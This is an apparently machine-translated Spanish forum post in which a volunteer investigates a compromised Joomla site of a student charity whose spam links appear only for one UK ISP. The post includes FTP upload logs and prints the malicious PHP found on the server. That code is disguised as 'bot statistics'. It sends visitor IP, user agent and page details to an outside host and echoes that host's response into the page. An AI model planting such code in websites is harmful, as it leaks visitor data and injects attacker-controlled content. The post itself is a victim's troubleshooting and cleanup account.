Por favor, vea segundo seguimiento en la parte inferior. (Ahora con código malicioso real agregado! ... ish)
Solicitado por esta pregunta, yo ' He notado que la organización de caridad estudiantil de mi universidad tiene un problema interesante en su sitio web del que hasta ahora no he podido encontrar la causa. (Pido disculpas si esto sería mejor en ServerFault, pero no parece haber ningún problema con el servidor en sí, ¡es más un problema de malware en algún lugar de la línea!)
Su sitio web, enlace tiene una carga completa de enlaces porno / malware en la parte inferior de la página (parece que esto para mí), pero creo, solo cuando lo ves desde una conexión de banda ancha O2. Si lo ve dentro de la red de la universidad u otro ISP, no aparece nada en la parte inferior y, como era de esperar, dentro de las páginas de administración de CMS, nada aparece como si estuviera en la plantilla o en las páginas.
Estoy 99% seguro de que el servidor no está ubicado dentro de la red de la universidad, mirando su IP (creo que está alojado en 'A Small Orange'). Definitivamente no soy la única persona que ha visto este problema, aunque no estoy seguro de si es específico de un solo ISP del Reino Unido, O2 Broadband (un amigo de otro ISP, TalkTalk ha confirmado que no ve nada). Nunca he visto algo como esto antes, no ha sido un caso simple de piratería del servidor y entrada de código a la página.
Apreciaría cualquier idea en cuanto a las rutas para resolver este problema, cualquier idea sobre qué podría estar causando esto y cualquier otro consejo.
Gracias.
Bien, ahora en seguimiento a la anterior (gracias a todos por su ayuda), ahora he logrado convencer a la empresa de alojamiento web para que me brinde acceso a SSH. Descubrí que el archivo .htaccess se ha modificado, y el archivo .htaccess actual es el siguiente: enlace , que supongo que es al menos parte del problema. Desde el punto de vista de la limpieza (en términos de avanzar / limpiar el sitio nuevamente), sé que debería limpiar todo el servidor y comenzar de nuevo.
Sin embargo , es un servidor de alojamiento compartido, por lo que no puedo borrarlo, ya que no tengo control de todo el servidor. He señalado a los servidores web que ha sido pirateado, y su consejo fue:
La cuenta es una cuenta de alojamiento compartido, pero el acceso está limitado solo a la cuenta en sí. No se pueden realizar modificaciones al propio servidor desde un compromiso de nivel de usuario.
Como no se ha puesto en peligro nada en el servidor (solo su cuenta), el acceso a jailshell proporcionado será suficiente para que pueda investigar y limpiar esta cuenta.
¿Es esto cierto? ¿Puedo limpiarlo correctamente? Supongo que si utilizaron una vulnerabilidad en el software que se ejecuta en mi sitio (es decir, Joomla), entonces sí, solo será mi parte del servidor la que se ha comprometido. Sin embargo, si el servidor está ejecutando una vulnerabilidad en el sistema operativo, es obvio que todo el lote podría verse comprometido. ¿Hay alguna forma de resolverlo?
En enlaces anteriores: he visto & lea todo esto .
... y ahora tengo los registros que muestran lo que han hecho:
Thu Feb 02 14:35:46 2012 0 213.5.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:49 2012 0 213.5.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:53 2012 0 213.5.xxx.xxx 34957 /home/durhamdu/public_html/libraries/joomla/environment/url.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:21:53 2012 0 128.127.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:00 2012 0 128.127.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:06 2012 0 128.127.xxx.xxx 1457 /home/durhamdu/public_html/mooving/check.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:09 2012 0 128.127.xxx.xxx 17986 /home/durhamdu/public_html/mooving/laundro.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:18 2012 0 128.127.xxx.xxx 52457 /home/durhamdu/public_html/.htaccess a _ i r durhamdu ftp
Los archivos a los que se hace referencia ya no están más, pero los enlaces siguen apareciendo, y aunque he cambiado el nombre del archivo sospechoso .htaccess . Hmm ...
Bien, en el segundo seguimiento, ahora he encontrado el código malicioso para su lectura colectiva:
<?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$sReferer = '';
if(isset($_SERVER['HTTP_REFERER']) === true)
{
$sReferer = strtolower($_SERVER['HTTP_REFERER']);
}
$stCurlHandle = NULL;
if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));
} else
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));
}
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = curl_exec($stCurlHandle);
curl_close($stCurlHandle);
echo $sResult; // Statistic code end
?>
Obviamente, ahora lo he quitado y estoy a punto de parchear la instalación de Joomla. ¡Gracias por su ayuda a todos! :-)